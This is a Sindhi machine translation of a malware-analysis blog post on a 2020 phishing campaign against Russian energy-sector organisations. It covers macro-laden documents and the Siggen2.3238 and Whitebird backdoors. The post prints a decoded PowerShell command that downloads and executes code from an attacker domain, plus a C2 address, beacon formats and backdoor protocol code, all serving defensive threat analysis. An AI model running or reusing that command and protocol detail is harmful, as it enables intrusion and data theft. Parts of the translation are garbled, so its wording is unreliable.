ڪمپيوٽر سيڪيورٽي واقعن جي تحقيقات ۾ اسان جو تجربو ڏيکاري ٿو ته اي ميل اڃا تائين سڀ کان وڌيڪ عام چينلن مان هڪ آهي جيڪو حملي ڪندڙن پاران استعمال ڪيو ويو آهي شروعاتي طور تي حملو ٿيل نيٽورڪ انفراسٽرڪچر کي داخل ڪرڻ لاء. هڪ مشڪوڪ (يا ايترو مشڪوڪ نه) خط سان هڪ لاپرواهه عمل وڌيڪ انفيڪشن لاءِ داخلا جو نقطو بڻجي ويندو آهي، اهو ئي سبب آهي ته سائبر ڪرمنلز فعال طور تي سوشل انجنيئرنگ طريقا استعمال ڪري رهيا آهن، جيتوڻيڪ ڪاميابي جي مختلف درجي سان.
هن پوسٽ ۾ اسان اسان جي تازي تحقيق بابت ڳالهائڻ چاهيون ٿا اسپام مهم ۾ روسي ايندھن ۽ توانائي جي ڪمپليڪس ۾ ڪيترن ئي ادارن کي نشانو بڻائڻ. سڀئي حملا جعلي اي ميلون استعمال ڪندي ساڳئي منظر جي پيروي ڪندا هئا، ۽ ڪنهن به انهن اي ميلن جي متن جي مواد ۾ گهڻي ڪوشش نه ڪئي هئي.
انٽيليجنس سروس
اهو سڀ ڪجهه اپريل 2020 جي آخر ۾ شروع ٿيو، جڏهن ڊاڪٽر ويب وائرس تجزيه نگارن هڪ اسپام مهم جو پتو لڳايو جنهن ۾ هيڪرز روسي فيول ۽ انرجي ڪمپليڪس ۾ ڪيترن ئي ادارن جي ملازمن کي هڪ اپڊيٽ ٽيليفون ڊاريڪٽري موڪلي. يقينن، اها تشويش جو هڪ سادي شو نه هو، ڇاڪاڻ ته ڊاريڪٽري حقيقي نه هئي، ۽ .docx دستاويزن دور دراز وسيلن کان ٻه تصويرون ڊائون لوڊ ڪيا.
انهن مان هڪ کي ڊائون لوڊ ڪيو ويو صارف جي ڪمپيوٽر تي خبرون[.]zannews[.]com سرور کان. اهو قابل ذڪر آهي ته ڊومين جو نالو قزاقستان جي اينٽي ڪرپشن ميڊيا سينٽر جي ڊومين سان ملندڙ جلندڙ آهي - zannews[.]kz. ٻئي طرف، استعمال ٿيل ڊومين فوري طور تي هڪ ٻي 2015 مهم جي ياد ڏياري وئي جيڪا TOPNEWS جي نالي سان مشهور آهي، جنهن ۾ هڪ ICEFOG پٺتي پيل دروازو استعمال ڪيو ويو ۽ انهن جي نالن ۾ "خبر" جي ذيلي اسٽرينگ سان ٽرجن ڪنٽرول ڊومينز هئي. هڪ ٻي دلچسپ خصوصيت اها هئي ته جڏهن مختلف وصول ڪندڙن ڏانهن اي ميلون موڪلڻ، هڪ تصوير کي ڊائون لوڊ ڪرڻ جي درخواست يا ته مختلف درخواستن جا پيرا ميٽر يا منفرد تصويري نالا استعمال ڪيا ويا.
اسان سمجهون ٿا ته اهو معلومات گڏ ڪرڻ جي مقصد لاءِ ڪيو ويو آهي هڪ ”معتبر“ ايڊريس جي سڃاڻپ ڪرڻ لاءِ، جنهن کي پوءِ ضمانت ڏني ويندي ته خط صحيح وقت تي کولڻ لاءِ. ايس ايم بي پروٽوڪول ٻئي سرور کان تصوير کي ڊائون لوڊ ڪرڻ لاءِ استعمال ڪيو ويو، جيڪو مليل دستاويز کي کولڻ وارن ملازمن جي ڪمپيوٽرن مان NetNTLM هيش گڏ ڪرڻ لاءِ ٿي سگهي ٿو.
۽ هتي اهو خط پاڻ جعلي ڊاريڪٽري سان آهي:
هن سال جون جون ۾، هيڪرز هڪ نئون ڊومين نالو استعمال ڪرڻ شروع ڪيو، اسپورٽس[.]manhajnews[.]com، تصويرون اپ لوڊ ڪرڻ لاءِ. تجزيو ظاهر ڪيو ته manhajnews[.]com ذيلي ڊومينز اسپام ميلنگ ۾ استعمال ڪيا ويا آهن گهٽ ۾ گهٽ سيپٽمبر 2019 کان. هن مهم جو هڪ مقصد هڪ وڏي روسي يونيورسٽي هئي.
گڏوگڏ، جون تائين، حملي جي منتظمين پنهنجن خطن لاء نئين متن سان گڏ آيا: هن وقت دستاويز صنعت جي ترقي بابت معلومات تي مشتمل آهي. خط جو متن واضح طور تي ظاهر ڪري ٿو ته ان جو ليکڪ يا ته روسي ٻولي ڳالهائيندڙ نه هو، يا ڄاڻي واڻي پنهنجي باري ۾ اهڙو تاثر پيدا ڪري رهيو هو. بدقسمتي سان، صنعت جي ترقي جا خيال، هميشه وانگر، صرف هڪ ڍڪ بڻجي ويا - دستاويز ٻيهر ٻه تصويرون ڊائون لوڊ ڪيو، جڏهن ته سرور کي ڊائون لوڊ ڪرڻ لاء تبديل ڪيو ويو [.]inklingpaper[.]com.
ايندڙ جدت جولاء ۾ پٺيان. اينٽي وائرس پروگرامن پاران بدسلوڪي دستاويزن جي ڳولا کي نظرانداز ڪرڻ جي ڪوشش ۾، حملي ڪندڙن پاسورڊ سان گڏ ٿيل Microsoft Word دستاويزن کي استعمال ڪرڻ شروع ڪيو. ساڳئي وقت، حملي ڪندڙن هڪ کلاسک سوشل انجنيئرنگ ٽيڪنڪ استعمال ڪرڻ جو فيصلو ڪيو - انعام جي اطلاع.
اپيل جو متن وري ساڳئي انداز ۾ لکيو ويو، جنهن مخاطب ۾ اضافي شڪ پيدا ڪيو. تصوير ڊائون لوڊ ڪرڻ لاء سرور پڻ تبديل نه ڪيو.
نوٽ ڪريو ته سڀني صورتن ۾، اليڪٽرانڪ ميل باڪس رجسٽرڊ ٿيل ميل تي[.]ru ۽ yandex[.]ru ڊومينز خط موڪلڻ لاءِ استعمال ڪيا ويا.
حملو ٿيو
سيپٽمبر 2020 جي شروعات تائين، اهو عمل لاء وقت هو. اسان جي وائرس تجزيه نگارن حملن جي هڪ نئين لهر کي رڪارڊ ڪيو، جنهن ۾ حملي آور ٻيهر ٽيليفون ڊاريڪٽري کي اپڊيٽ ڪرڻ جي بهاني تحت خط موڪليا. بهرحال، هن ڀيري منسلڪ هڪ خراب ميڪرو تي مشتمل آهي.
جڏهن منسلڪ دستاويز کي کوليو، ميڪرو ٻه فائلون ٺاهي:
- VBS اسڪرپٽ %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs، جنهن جو مقصد هڪ بيچ فائل لانچ ڪرڻ هو؛
- بيچ فائل پاڻ %APPDATA%configstest.bat، جيڪا مبهم هئي.
ان جي ڪم جو جوهر هيٺ اچي ٿو پاور شيل شيل کي لانچ ڪرڻ لاءِ ڪجهه پيٽرولر سان. شيل ڏانهن منظور ٿيل پيراگراف حڪمن ۾ ڊيڪوڊ ڪيا ويا آهن:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;جيئن پيش ڪيل حڪمن مان هيٺ ڏنل، ڊومين جنهن مان پيل لوڊ ڊائون لوڊ ڪيو ويو آهي ٻيهر هڪ نيوز سائيٽ جي طور تي ظاهر ڪيو ويو آهي. هڪ سادي ، جنهن جو واحد ڪم ڪمانڊ ۽ ڪنٽرول سرور کان شيل ڪوڊ حاصل ڪرڻ ۽ ان تي عمل ڪرڻ آهي. اسان ٻن قسمن جي پٺاڻن جي سڃاڻپ ڪرڻ جي قابل ٿي ويا جيڪي قرباني جي PC تي نصب ڪري سگھجن ٿيون.
Backdoor.Siggen2.3238
پهرين هڪ آهي Backdoor.Siggen2.3238 - اسان جي ماهرن کي اڳ ۾ نه مليا هئا، ۽ ٻين اينٽي وائرس وينڊرز طرفان هن پروگرام جو ڪو به ذڪر نه ڪيو ويو آهي.
هي پروگرام هڪ پوئين دروازي تي لکيل آهي C++ ۾ ۽ 32-bit ونڊوز آپريٽنگ سسٽم تي هلندڙ آهي.
Backdoor.Siggen2.3238 ٻه پروٽوڪول استعمال ڪندي مئنيجمينٽ سرور سان رابطو ڪرڻ جي قابل آهي: HTTP ۽ HTTPS. آزمائشي نموني استعمال ڪري ٿو HTTPS پروٽوڪول. هيٺ ڏنل يوزر-ايجنٽ استعمال ڪيو ويندو آهي سرور جي درخواستن ۾:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
انهي حالت ۾، سڀني درخواستن کي ڏنل پيٽرولن جي سيٽ سان فراهم ڪيو ويو آهي:
%s;type=%s;length=%s;realdata=%send
جتي هر لڪير %s مطابق بدلجي ويندي آهي:
- متاثر ٿيل ڪمپيوٽر جي سڃاڻپ،
- موڪل جو قسم،
- حقيقي ڊيٽا جي فيلڊ ۾ ڊيٽا جي ڊيگهه،
- ڊيٽا
متاثر ٿيل سسٽم بابت معلومات گڏ ڪرڻ جي مرحلي ۾، پوئين دروازي هڪ لڪير ٺاهي ٿو جهڙوڪ:
lan=%s;cmpname=%s;username=%s;version=%s;
جتي lan متاثر ٿيل ڪمپيوٽر جو IP پتو آهي، cmpname ڪمپيوٽر جو نالو آهي، يوزرنيم يوزر جو نالو آهي، ورجن لائن 0.0.4.03 آهي.
هي معلومات sysinfo سڃاڻپ ڪندڙ سان گڏ موڪلي وئي آهي پوسٽ درخواست ذريعي ڪنٽرول سرور تي واقع آهي https[:]/31.214[.]157.14/log.txt. جيڪڏهن جواب ۾ Backdoor.Siggen2.3238 HEART سگنل وصول ڪري ٿو، ڪنيڪشن ڪامياب سمجهيو ويندو آهي، ۽ پوئين دروازي سرور سان رابطي جو بنيادي چڪر شروع ڪري ٿو.
آپريٽنگ اصولن جي وڌيڪ مڪمل وضاحت Backdoor.Siggen2.3238 اسان ۾ آهي .
پوئتي دروازو.سفيد پکي.23
ٻيو پروگرام BackDoor.Whitebird backdoor جي تبديلي آهي، جيڪو اسان کي اڳ ۾ ئي قزاقستان جي هڪ سرڪاري ايجنسي سان ٿيل واقعن کان معلوم ٿيو آهي. هي نسخو C++ ۾ لکيل آهي ۽ 32-bit ۽ 64-bit ونڊوز آپريٽنگ سسٽم ٻنهي تي هلائڻ لاءِ ٺهيل آهي.
هن قسم جي اڪثر پروگرامن وانگر، پوئتي دروازو.سفيد پکي.23 ڪنٽرول سرور ۽ متاثر ٿيل ڪمپيوٽر جي غير مجاز ڪنٽرول سان هڪ اينڪرپٽ ڪنيڪشن قائم ڪرڻ لاءِ ٺهيل آهي. هڪ ڊراپر استعمال ڪندي ٺهڪندڙ سسٽم ۾ نصب ڪيو ويو آهي .
نمونو جيڪو اسان جانچيو هو هڪ بدسلوڪي لائبريري هئي ٻن برآمدن سان:
- Google Play
- ٽيسٽ.
ان جي ڪم جي شروعات ۾، اهو بائيٽ 0x99 سان XOR آپريشن جي بنياد تي الورورٿم استعمال ڪندي پٺئين دروازي ۾ هارڊ وائر ٿيل ترتيبن کي رد ڪري ٿو. تشڪيل هن طرح نظر اچي ٿو:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
ان جي مسلسل آپريشن کي يقيني بڻائڻ لاء، پوئين دروازي فيلڊ ۾ بيان ڪيل قدر کي تبديل ڪري ٿو ڪم جا ڪلاڪ ترتيبون. فيلڊ ۾ 1440 بائيٽ شامل آهن، جيڪي قيمتون 0 يا 1 وٺن ٿا ۽ ڏينهن ۾ هر ڪلاڪ جي هر منٽ جي نمائندگي ڪن ٿا. هر نيٽ ورڪ انٽرفيس لاءِ هڪ الڳ ٿريڊ ٺاهي ٿو جيڪو انٽرفيس کي ٻڌي ٿو ۽ متاثر ٿيل ڪمپيوٽر مان پراکسي سرور تي اٿارٽي پيڪٽس ڳولي ٿو. جڏهن اهڙي پيڪٽ معلوم ٿئي ٿي، پٺئين دروازي کي پراکسي سرور بابت معلومات شامل ڪري ٿو ان جي لسٽ ۾. اضافي طور تي، WinAPI ذريعي هڪ پراکسي جي موجودگي لاء چيڪ ڪري ٿو InternetQueryOptionW.
پروگرام موجوده منٽ ۽ ڪلاڪ کي چيڪ ڪري ٿو ۽ ان کي فيلڊ ۾ ڊيٽا سان مقابلو ڪري ٿو ڪم جا ڪلاڪ ترتيبون. جيڪڏهن ڏينهن جي لاڳاپيل منٽ لاء قيمت صفر نه آهي، پوء ڪنٽرول سرور سان ڪنيڪشن قائم ڪئي وئي آهي.
سرور سان ڪنيڪشن قائم ڪرڻ ڪلائنٽ ۽ سرور جي وچ ۾ TLS ورزن 1.0 پروٽوڪول استعمال ڪندي ڪنيڪشن جي تخليق کي ترتيب ڏئي ٿو. پوئين دروازي جي جسم ۾ ٻه بفر شامل آهن.
پهرين بفر تي مشتمل آهي TLS 1.0 ڪلائنٽ هيلو پيڪٽ.
ٻئي بفر تي مشتمل آهي TLS 1.0 ڪلائنٽ ڪيئي ايڪسچينج پيڪٽس جنهن جي ڪنجي ڊگھائي 0x100 بائيٽس، ڪيفير اسپيڪ کي تبديل ڪريو، انڪريپٹڊ هينڊ شيڪ ميسيج.
ڪلائنٽ هيلو پيڪٽ موڪلڻ وقت، پوئين دروازي ڪلائنٽ رينڊم فيلڊ ۾ موجوده وقت جا 4 بائيٽ ۽ 28 بائيٽ سيڊو-رينڊم ڊيٽا لکي ٿو، جنهن جو حساب هن ريت آهي:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
وصول ٿيل پيڪٽ ڪنٽرول سرور ڏانهن موڪليو ويو آهي. جواب (سرور هيلو پيڪٽ) چيڪ ڪري ٿو:
- TLS پروٽوڪول ورزن 1.0 سان تعميل؛
- ٽائم اسٽيمپ جو خطوط (رنڊم ڊيٽا پيڪٽ فيلڊ جي پهرين 4 بائيٽ) ڪلائنٽ طرفان بيان ڪيل ٽائم اسٽيمپ سان سرور طرفان بيان ڪيل؛
- ڪلائنٽ ۽ سرور جي بي ترتيب ڊيٽا فيلڊ ۾ ٽائم اسٽيمپ کان پوء پهرين 4 بائيٽ جو ميچ.
مخصوص ميچز جي صورت ۾، پوئين دروازي هڪ ڪلائنٽ ڪيئي ايڪسچينج پيڪيٽ تيار ڪري ٿو. هن کي ڪرڻ لاءِ، اهو ڪلائنٽ ڪيئي ايڪسچينج پيڪيج ۾ پبلڪ ڪيئي کي تبديل ڪري ٿو، انهي سان گڏ انڪريپشن IV ۽ انڪريپشن ڊيٽا کي انڪريپٽ ٿيل هينڊ شيڪ ميسيج پيڪيج ۾.
پوئين دروازو وري ڪمانڊ ۽ ڪنٽرول سرور کان پيڪٽ وصول ڪري ٿو، چيڪ ڪري ٿو ته TLS پروٽوڪول ورزن 1.0 آهي، ۽ پوءِ قبول ڪري ٿو ٻيو 54 بائيٽ (پيڪٽ جو جسم). هي ڪنيڪشن سيٽ اپ مڪمل ڪري ٿو.
آپريٽنگ اصولن جي وڌيڪ مڪمل وضاحت پوئتي دروازو.سفيد پکي.23 اسان ۾ آهي .
نتيجو ۽ نتيجو
دستاويزن جو تجزيو، مالويئر، ۽ استعمال ڪيل انفراسٽرڪچر اسان کي يقين سان چوڻ جي اجازت ڏئي ٿو ته حملو چيني APT گروپن مان هڪ طرفان تيار ڪيو ويو آهي. پٺئين دروازن جي ڪارڪردگي تي غور ڪندي جيڪي متاثرين جي ڪمپيوٽرن تي نصب ٿيل آهن هڪ ڪامياب حملي جي صورت ۾، انفيڪشن گهٽ ۾ گهٽ، حملو ڪندڙ تنظيمن جي ڪمپيوٽرن کان ڳجهي معلومات جي چوري ڏانهن وٺي ٿو.
ان کان علاوه، هڪ تمام گهڻو امڪاني منظر آهي خاص ٽرجن جي تنصيب مقامي سرور تي هڪ خاص فنڪشن سان. اهي ٿي سگهن ٿا ڊومين ڪنٽرولر، ميل سرور، انٽرنيٽ گيٽ ويز وغيره. جيئن اسان مثال ۾ ڏسي سگهون ٿا , اهڙا سرور مختلف سببن جي ڪري حملي ڪندڙن لاءِ خاص دلچسپي رکن ٿا.
جو ذريعو: www.habr.com